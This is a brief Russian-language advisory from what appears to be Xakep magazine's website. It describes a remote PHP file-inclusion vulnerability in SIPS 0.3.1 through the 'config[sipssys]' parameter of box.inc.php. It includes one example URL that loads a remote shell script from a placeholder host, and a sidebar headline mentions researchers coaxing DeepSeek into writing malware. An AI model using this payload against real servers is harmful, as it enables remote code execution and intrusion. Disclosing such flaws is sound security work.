PHP-инклюдинг в SIPS

Рекомендуем почитать:

Хакер #309. Самооборона по-хакерски

Содержание выпуска
Подписка на «Хакер»-60%

Программа: SIPS 0.3.1

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «config[sipssys]» сценарием box.inc.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

/sipssys/code/box.inc.php?config[sipssys]=http://[target]/[path]/shell.x

PHP-инклюдинг в SIPS

Хакер #309. Самооборона по-хакерски

Подпишись на наc в Telegram!

Из рубрики «Взлом»

Хакеры.RU. Глава 0х13. Человеческий фактор

Максимальный Minecraft. Поднимаем свой игровой сервер с модами и плагинами

Охота на криперов. Изучаем образцы малвари для Minecraft

Вайфу-генераторы. Разбираемся с моделями для создания картинок в стиле аниме

Трюки

Телеграмма для дельфина. Управляем Flipper Zero удаленно при помощи Raspberry Pi и Telegram

Не тапай хомяка! Как я автоматизировал игру Hamster Kombat

Кастомный Arch. Создаем образы Arch Linux для десктопа и Raspberry Pi

Диета для Arch Linux. Запускаем Arch на компьютерах с малым объемом памяти

Последние новости

Исследователи вынудили DeepSeek писать малварь

В библиотеке FreeType обнаружили 0-day уязвимость

СМИ: ICANN намерена вывести из эксплуатации домен .su

Открываем прием предзаказов на бумажную версию книги «Хакеры.RU»

Microsoft извинилась за удаление популярных расширений VSCode